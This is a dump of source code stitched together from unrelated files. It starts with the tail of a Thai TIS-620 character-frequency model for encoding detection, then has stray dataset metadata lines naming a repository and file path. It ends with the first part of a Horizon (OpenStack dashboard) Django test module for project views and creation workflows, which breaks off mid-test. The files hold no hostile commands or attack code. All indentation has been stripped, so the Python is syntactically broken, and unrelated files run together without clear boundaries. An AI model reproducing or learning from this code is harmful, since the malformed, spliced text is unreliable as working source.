# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# The following result for thai was collected from a limited sample (1M).
# Character Mapping Table:
TIS620CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,182,106,107,100,183,184,185,101, 94,186,187,108,109,110,111, # 40
188,189,190, 89, 95,112,113,191,192,193,194,253,253,253,253,253, # 50
253, 64, 72, 73,114, 74,115,116,102, 81,201,117, 90,103, 78, 82, # 60
96,202, 91, 79, 84,104,105, 97, 98, 92,203,253,253,253,253,253, # 70
209,210,211,212,213, 88,214,215,216,217,218,219,220,118,221,222,
223,224, 99, 85, 83,225,226,227,228,229,230,231,232,233,234,235,
236, 5, 30,237, 24,238, 75, 8, 26, 52, 34, 51,119, 47, 58, 57,
49, 53, 55, 43, 20, 19, 44, 14, 48, 3, 17, 25, 39, 62, 31, 54,
45, 9, 16, 2, 61, 15,239, 12, 42, 46, 18, 21, 76, 4, 66, 63,
22, 10, 1, 36, 23, 13, 40, 27, 32, 35, 86,240,241,242,243,244,
11, 28, 41, 29, 33,245, 50, 37, 6, 7, 67, 77, 38, 93,246,247,
68, 56, 59, 65, 69, 60, 70, 80, 71, 87,248,249,250,251,252,253,
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 92.6386%
# first 1024 sequences:7.3177%
# rest sequences: 1.0230%
# negative sequences: 0.0436%
ThaiLangModel = (
0,1,3,3,3,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,0,0,3,3,3,0,3,3,3,3,
0,3,3,0,0,0,1,3,0,3,3,2,3,3,0,1,2,3,3,3,3,0,2,0,2,0,0,3,2,1,2,2,
3,0,3,3,2,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,0,3,2,3,0,2,2,2,3,
0,2,3,0,0,0,0,1,0,1,2,3,1,1,3,2,2,0,1,1,0,0,1,0,0,0,0,0,0,0,1,1,
3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,3,3,2,3,2,3,3,2,2,2,
3,1,2,3,0,3,3,2,2,1,2,3,3,1,2,0,1,3,0,1,0,0,1,0,0,0,0,0,0,0,1,1,
3,3,2,2,3,3,3,3,1,2,3,3,3,3,3,2,2,2,2,3,3,2,2,3,3,2,2,3,2,3,2,2,
3,3,1,2,3,1,2,2,3,3,1,0,2,1,0,0,3,1,2,1,0,0,1,0,0,0,0,0,0,1,0,1,
3,3,3,3,3,3,2,2,3,3,3,3,2,3,2,2,3,3,2,2,3,2,2,2,2,1,1,3,1,2,1,1,
3,2,1,0,2,1,0,1,0,1,1,0,1,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,3,3,2,3,2,3,3,2,2,3,2,3,3,2,3,1,1,2,3,2,2,2,3,2,2,2,2,2,1,2,1,
2,2,1,1,3,3,2,1,0,1,2,2,0,1,3,0,0,0,1,1,0,0,0,0,0,2,3,0,0,2,1,1,
3,3,2,3,3,2,0,0,3,3,0,3,3,0,2,2,3,1,2,2,1,1,1,0,2,2,2,0,2,2,1,1,
0,2,1,0,2,0,0,2,0,1,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,
3,3,2,3,3,2,0,0,3,3,0,2,3,0,2,1,2,2,2,2,1,2,0,0,2,2,2,0,2,2,1,1,
0,2,1,0,2,0,0,2,0,1,1,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,
3,3,2,3,2,3,2,0,2,2,1,3,2,1,3,2,1,2,3,2,2,3,0,2,3,2,2,1,2,2,2,2,
1,2,2,0,0,0,0,2,0,1,2,0,1,1,1,0,1,0,3,1,1,0,0,0,0,0,0,0,0,0,1,0,
3,3,2,3,3,2,3,2,2,2,3,2,2,3,2,2,1,2,3,2,2,3,1,3,2,2,2,3,2,2,2,3,
3,2,1,3,0,1,1,1,0,2,1,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,2,0,0,
1,0,0,3,0,3,3,3,3,3,0,0,3,0,2,2,3,3,3,3,3,0,0,0,1,1,3,0,0,0,0,2,
0,0,1,0,0,0,0,0,0,0,2,3,0,0,0,3,0,2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,
2,0,3,3,3,3,0,0,2,3,0,0,3,0,3,3,2,3,3,3,3,3,0,0,3,3,3,0,0,0,3,3,
0,0,3,0,0,0,0,2,0,0,2,1,1,3,0,0,1,0,0,2,3,0,1,0,0,0,0,0,0,0,1,0,
3,3,3,3,2,3,3,3,3,3,3,3,1,2,1,3,3,2,2,1,2,2,2,3,1,1,2,0,2,1,2,1,
2,2,1,0,0,0,1,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,
3,0,2,1,2,3,3,3,0,2,0,2,2,0,2,1,3,2,2,1,2,1,0,0,2,2,1,0,2,1,2,2,
0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,1,3,3,1,1,3,0,2,3,1,1,3,2,1,1,2,0,2,2,3,2,1,1,1,1,1,2,
3,0,0,1,3,1,2,1,2,0,3,0,0,0,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,
3,3,1,1,3,2,3,3,3,1,3,2,1,3,2,1,3,2,2,2,2,1,3,3,1,2,1,3,1,2,3,0,
2,1,1,3,2,2,2,1,2,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,
3,3,2,3,2,3,3,2,3,2,3,2,3,3,2,1,0,3,2,2,2,1,2,2,2,1,2,2,1,2,1,1,
2,2,2,3,0,1,3,1,1,1,1,0,1,1,0,2,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,3,2,2,1,1,3,2,3,2,3,2,0,3,2,2,1,2,0,2,2,2,1,2,2,2,2,1,
3,2,1,2,2,1,0,2,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,2,3,1,2,3,3,2,2,3,0,1,1,2,0,3,3,2,2,3,0,1,1,3,0,0,0,0,
3,1,0,3,3,0,2,0,2,1,0,0,3,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,2,3,2,3,3,0,1,3,1,1,2,1,2,1,1,3,1,1,0,2,3,1,1,1,1,1,1,1,1,
3,1,1,2,2,2,2,1,1,1,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,2,2,1,1,2,1,3,3,2,3,2,2,3,2,2,3,1,2,2,1,2,0,3,2,1,2,2,2,2,2,1,
3,2,1,2,2,2,1,1,1,1,0,0,1,1,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,1,3,3,0,2,1,0,3,2,0,0,3,1,0,1,1,0,1,0,0,0,0,0,1,
1,0,0,1,0,3,2,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,2,2,2,3,0,0,1,3,0,3,2,0,3,2,2,3,3,3,3,3,1,0,2,2,2,0,2,2,1,2,
0,2,3,0,0,0,0,1,0,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,0,2,3,1,3,3,2,3,3,0,3,3,0,3,2,2,3,2,3,3,3,0,0,2,2,3,0,1,1,1,3,
0,0,3,0,0,0,2,2,0,1,3,0,1,2,2,2,3,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,
3,2,3,3,2,0,3,3,2,2,3,1,3,2,1,3,2,0,1,2,2,0,2,3,2,1,0,3,0,0,0,0,
3,0,0,2,3,1,3,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,3,2,2,2,1,2,0,1,3,1,1,3,1,3,0,0,2,1,1,1,1,2,1,1,1,0,2,1,0,1,
1,2,0,0,0,3,1,1,0,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,0,3,1,0,0,0,1,0,
3,3,3,3,2,2,2,2,2,1,3,1,1,1,2,0,1,1,2,1,2,1,3,2,0,0,3,1,1,1,1,1,
3,1,0,2,3,0,0,0,3,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,2,3,0,3,3,0,2,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,2,3,1,3,0,0,1,2,0,0,2,0,3,3,2,3,3,3,2,3,0,0,2,2,2,0,0,0,2,2,
0,0,1,0,0,0,0,3,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
0,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,1,2,3,1,3,3,0,0,1,0,3,0,0,0,0,0,
0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,1,2,3,1,2,3,1,0,3,0,2,2,1,0,2,1,1,2,0,1,0,0,1,1,1,1,0,1,0,0,
1,0,0,0,0,1,1,0,3,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,1,0,1,1,1,3,1,2,2,2,2,2,2,1,1,1,1,0,3,1,0,1,3,1,1,1,1,
1,1,0,2,0,1,3,1,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,1,
3,0,2,2,1,3,3,2,3,3,0,1,1,0,2,2,1,2,1,3,3,1,0,0,3,2,0,0,0,0,2,1,
0,1,0,0,0,0,1,2,0,1,1,3,1,1,2,2,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
0,0,3,0,0,1,0,0,0,3,0,0,3,0,3,1,0,1,1,1,3,2,0,0,0,3,0,0,0,0,2,0,
0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,1,3,2,1,3,3,1,2,2,0,1,2,1,0,1,2,0,0,0,0,0,3,0,0,0,3,0,0,0,0,
3,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,1,2,0,3,3,3,2,2,0,1,1,0,1,3,0,0,0,2,2,0,0,0,0,3,1,0,1,0,0,0,
0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,2,3,1,2,0,0,2,1,0,3,1,0,1,2,0,1,1,1,1,3,0,0,3,1,1,0,2,2,1,1,
0,2,0,0,0,0,0,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,3,1,2,0,0,2,2,0,1,2,0,1,0,1,3,1,2,1,0,0,0,2,0,3,0,0,0,1,0,
0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,1,1,2,2,0,0,0,2,0,2,1,0,1,1,0,1,1,1,2,1,0,0,1,1,1,0,2,1,1,1,
0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,1,
0,0,0,2,0,1,3,1,1,1,1,0,0,0,0,3,2,0,1,0,0,0,1,2,0,0,0,1,0,0,0,0,
0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,2,3,2,2,0,0,0,1,0,0,0,0,2,3,2,1,2,2,3,0,0,0,2,3,1,0,0,0,1,1,
0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,
3,3,2,2,0,1,0,0,0,0,2,0,2,0,1,0,0,0,1,1,0,0,0,2,1,0,1,0,1,1,0,0,
0,1,0,2,0,0,1,0,3,0,1,0,0,0,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,1,0,0,1,0,0,0,0,0,1,1,2,0,0,0,0,1,0,0,1,3,1,0,0,0,0,1,1,0,0,
0,1,0,0,0,0,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,
3,3,1,1,1,1,2,3,0,0,2,1,1,1,1,1,0,2,1,1,0,0,0,2,1,0,1,2,1,1,0,1,
2,1,0,3,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,3,1,0,0,0,0,0,0,0,3,0,0,0,3,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,
0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,2,0,0,0,0,0,0,1,2,1,0,1,1,0,2,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,2,0,0,0,1,3,0,1,0,0,0,2,0,0,0,0,0,0,0,1,2,0,0,0,0,0,
3,3,0,0,1,1,2,0,0,1,2,1,0,1,1,1,0,1,1,0,0,2,1,1,0,1,0,0,1,1,1,0,
0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,1,0,0,0,0,1,0,0,0,0,3,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,0,0,1,1,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,0,1,2,0,1,2,0,0,1,1,0,2,0,1,0,0,1,0,0,0,0,1,0,0,0,2,0,0,0,0,
1,0,0,1,0,1,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,2,1,3,0,0,0,0,1,1,0,0,0,0,0,0,0,3,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,1,0,1,0,0,2,0,0,2,0,0,1,1,2,0,0,1,1,0,0,0,1,0,0,0,1,1,0,0,0,
1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,3,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,
1,0,0,0,0,0,0,0,0,1,0,0,0,0,2,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,1,0,0,2,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
)
TIS620ThaiModel = {
'charToOrderMap': TIS620CharToOrderMap,
'precedenceMatrix': ThaiLangModel,
'mTypicalPositiveRatio': 0.926386,
'keepEnglishLetter': False,
'charsetName': "TIS-620"
}
# flake8: noqa
|
cc0-1.0
|
wangxiangyu/horizon
|
openstack_dashboard/dashboards/identity/projects/tests.py
|
15
|
80359
|
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import datetime
import logging
import os
import django
from django.core.urlresolvers import reverse
from django import http
from django.test.utils import override_settings
from django.utils import timezone
from django.utils import unittest
from mox import IgnoreArg # noqa
from mox import IsA # noqa
from horizon import exceptions
from horizon.workflows import views
from openstack_dashboard import api
from openstack_dashboard.dashboards.identity.projects import workflows
from openstack_dashboard import policy_backend
from openstack_dashboard.test import helpers as test
from openstack_dashboard import usage
from openstack_dashboard.usage import quotas
with_sel = os.environ.get('WITH_SELENIUM', False)
if with_sel:
from selenium.webdriver import ActionChains # noqa
from selenium.webdriver.common import keys
from socket import timeout as socket_timeout # noqa
INDEX_URL = reverse('horizon:identity:projects:index')
USER_ROLE_PREFIX = workflows.PROJECT_USER_MEMBER_SLUG + "_role_"
GROUP_ROLE_PREFIX = workflows.PROJECT_GROUP_MEMBER_SLUG + "_role_"
PROJECT_DETAIL_URL = reverse('horizon:identity:projects:detail', args=[1])
class TenantsViewTests(test.BaseAdminViewTests):
@test.create_stubs({api.keystone: ('tenant_list',)})
def test_index(self):
api.keystone.tenant_list(IsA(http.HttpRequest),
domain=None,
paginate=True,
marker=None) \
.AndReturn([self.tenants.list(), False])
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'identity/projects/index.html')
self.assertItemsEqual(res.context['table'].data, self.tenants.list())
@test.create_stubs({api.keystone: ('tenant_list', )})
def test_index_with_domain_context(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
domain_tenants = [tenant for tenant in self.tenants.list()
if tenant.domain_id == domain.id]
api.keystone.tenant_list(IsA(http.HttpRequest),
domain=domain.id,
paginate=True,
marker=None) \
.AndReturn([domain_tenants, False])
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'identity/projects/index.html')
self.assertItemsEqual(res.context['table'].data, domain_tenants)
self.assertContains(res, "<em>test_domain:</em>")
class ProjectsViewNonAdminTests(test.TestCase):
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
@test.create_stubs({api.keystone: ('tenant_list',)})
def test_index(self):
api.keystone.tenant_list(IsA(http.HttpRequest),
user=self.user.id,
paginate=True,
marker=None,
admin=False) \
.AndReturn([self.tenants.list(), False])
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'identity/projects/index.html')
self.assertItemsEqual(res.context['table'].data, self.tenants.list())
class CreateProjectWorkflowTests(test.BaseAdminViewTests):
def _get_project_info(self, project):
domain = self._get_default_domain()
project_info = {"name": project.name,
"description": project.description,
"enabled": project.enabled,
"domain": domain.id}
return project_info
def _get_workflow_fields(self, project):
domain = self._get_default_domain()
project_info = {"domain_id": domain.id,
"domain_name": domain.name,
"name": project.name,
"description": project.description,
"enabled": project.enabled}
return project_info
def _get_quota_info(self, quota):
cinder_quota = self.cinder_quotas.first()
neutron_quota = self.neutron_quotas.first()
quota_data = {}
for field in quotas.NOVA_QUOTA_FIELDS:
quota_data[field] = int(quota.get(field).limit)
for field in quotas.CINDER_QUOTA_FIELDS:
quota_data[field] = int(cinder_quota.get(field).limit)
for field in quotas.NEUTRON_QUOTA_FIELDS:
quota_data[field] = int(neutron_quota.get(field).limit)
return quota_data
def _get_workflow_data(self, project, quota):
project_info = self._get_workflow_fields(project)
quota_data = self._get_quota_info(quota)
project_info.update(quota_data)
return project_info
def _get_default_domain(self):
default_domain = self.domain
domain = {"id": self.request.session.get('domain_context',
default_domain.id),
"name": self.request.session.get('domain_context_name',
default_domain.name)}
return api.base.APIDictWrapper(domain)
def _get_all_users(self, domain_id):
if not domain_id:
users = self.users.list()
else:
users = [user for user in self.users.list()
if user.domain_id == domain_id]
return users
def _get_all_groups(self, domain_id):
if not domain_id:
groups = self.groups.list()
else:
groups = [group for group in self.groups.list()
if group.domain_id == domain_id]
return groups
@test.create_stubs({api.keystone: ('get_default_domain',
'get_default_role',
'user_list',
'group_list',
'role_list'),
api.base: ('is_service_enabled',),
api.neutron: ('is_extension_supported',),
quotas: ('get_default_quota_data',)})
def test_add_project_get(self):
quota = self.quotas.first()
default_role = self.roles.first()
default_domain = self._get_default_domain()
domain_id = default_domain.id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
# init
api.base.is_service_enabled(IsA(http.HttpRequest), 'network') \
.MultipleTimes().AndReturn(True)
api.base.is_service_enabled(IsA(http.HttpRequest), 'volume') \
.MultipleTimes().AndReturn(True)
api.keystone.get_default_domain(IsA(http.HttpRequest)) \
.AndReturn(default_domain)
api.neutron.is_extension_supported(
IsA(http.HttpRequest), 'security-group').AndReturn(True)
quotas.get_default_quota_data(IsA(http.HttpRequest)).AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)).AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
api.keystone.role_list(IsA(http.HttpRequest)).AndReturn(roles)
self.mox.ReplayAll()
url = reverse('horizon:identity:projects:create')
res = self.client.get(url)
self.assertTemplateUsed(res, views.WorkflowView.template_name)
self.assertContains(res, '<input type="hidden" name="subnet" '
'id="id_subnet" />', html=True)
workflow = res.context['workflow']
self.assertEqual(res.context['workflow'].name,
workflows.CreateProject.name)
step = workflow.get_step("createprojectinfoaction")
self.assertEqual(step.action.initial['ram'], quota.get('ram').limit)
self.assertEqual(step.action.initial['injected_files'],
quota.get('injected_files').limit)
self.assertQuerysetEqual(
workflow.steps,
['<CreateProjectInfo: createprojectinfoaction>',
'<UpdateProjectMembers: update_members>',
'<UpdateProjectGroups: update_group_members>',
'<CreateProjectQuota: create_quotas>'])
def test_add_project_get_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_add_project_get()
@test.create_stubs({api.keystone: ('get_default_role',
'user_list',
'group_list',
'role_list',
'domain_get'),
api.neutron: ('is_extension_supported',
'tenant_quota_get'),
quotas: ('get_default_quota_data',)})
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_add_project_get_with_neutron(self):
quota = self.quotas.first()
neutron_quotas = self.neutron_quotas.first()
quotas.get_default_quota_data(IsA(http.HttpRequest)) \
.AndReturn(quota)
api.neutron.is_extension_supported(IsA(http.HttpRequest), 'quotas') \
.MultipleTimes().AndReturn(True)
api.neutron.is_extension_supported(
IsA(http.HttpRequest), 'security-group').AndReturn(True)
api.neutron.tenant_quota_get(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(neutron_quotas)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(self.roles.first())
api.keystone.user_list(IsA(http.HttpRequest), domain=None) \
.AndReturn(self.users.list())
api.keystone.role_list(IsA(http.HttpRequest)) \
.AndReturn(self.roles.list())
api.keystone.group_list(IsA(http.HttpRequest), domain=None) \
.AndReturn(self.groups.list())
api.keystone.role_list(IsA(http.HttpRequest)) \
.AndReturn(self.roles.list())
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:identity:projects:create'))
self.assertTemplateUsed(res, views.WorkflowView.template_name)
if django.VERSION >= (1, 6):
self.assertContains(res, '''
<input class="form-control"
id="id_subnet" min="-1"
name="subnet" type="number" value="10" />
''', html=True)
else:
self.assertContains(res, '''
<input class="form-control"
name="subnet" id="id_subnet"
value="10" type="text" />
''', html=True)
workflow = res.context['workflow']
self.assertEqual(res.context['workflow'].name,
workflows.CreateProject.name)
step = workflow.get_step("createprojectinfoaction")
self.assertEqual(step.action.initial['ram'], quota.get('ram').limit)
self.assertEqual(step.action.initial['subnet'],
neutron_quotas.get('subnet').limit)
@test.create_stubs({api.keystone: ('get_default_role',
'add_tenant_user_role',
'tenant_create',
'user_list',
'group_list',
'role_list',
'domain_get'),
quotas: ('get_default_quota_data',
'get_disabled_quotas',
'tenant_quota_usages',),
api.cinder: ('tenant_quota_update',),
api.nova: ('tenant_quota_update',)})
def test_add_project_post(self, neutron=False):
project = self.tenants.first()
quota = self.quotas.first()
default_role = self.roles.first()
default_domain = self._get_default_domain()
domain_id = default_domain.id
users = self._get_all_users(domain_id)
groups = self._get_all_groups(domain_id)
roles = self.roles.list()
# init
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
if neutron:
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_default_quota_data(IsA(http.HttpRequest)).AndReturn(quota)
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(default_role)
api.keystone.user_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(roles)
api.keystone.group_list(IsA(http.HttpRequest), domain=domain_id) \
.AndReturn(groups)
# handle
project_details = self._get_project_info(project)
quota_data = self._get_quota_info(quota)
api.keystone.tenant_create(IsA(http.HttpRequest), **project_details) \
.AndReturn(project)
workflow_data = {}
for role in roles:
if USER_ROLE_PREFIX + role.id in workflow_data:
ulist = workflow_data[USER_ROLE_PREFIX + role.id]
for user_id in ulist:
api.keystone.add_tenant_user_role(IsA(http.HttpRequest),
project=self.tenant.id,
user=user_id,
role=role.id)
for role in roles:
if GROUP_ROLE_PREFIX + role.id in workflow_data:
ulist = workflow_data[GROUP_ROLE_PREFIX + role.id]
for group_id in ulist:
api.keystone.add_group_role(IsA(http.HttpRequest),
role=role.id,
group=group_id,
project=self.tenant.id)
nova_updated_quota = dict([(key, quota_data[key]) for key in
quotas.NOVA_QUOTA_FIELDS])
api.nova.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**nova_updated_quota)
cinder_updated_quota = dict([(key, quota_data[key]) for key in
quotas.CINDER_QUOTA_FIELDS])
api.cinder.tenant_quota_update(IsA(http.HttpRequest),
project.id,
**cinder_updated_quota)
self.mox.ReplayAll()
workflow_data.update(self._get_workflow_data(project, quota))
url = reverse('horizon:identity:projects:create')
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
def test_add_project_post_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_add_project_post()
@test.create_stubs({api.neutron: ('is_extension_supported',
'tenant_quota_update')})
@test.update_settings(OPENSTACK_NEUTRON_NETWORK={'enable_quotas': True})
def test_add_project_post_with_neutron(self):
quota_data = self.neutron_quotas.first()
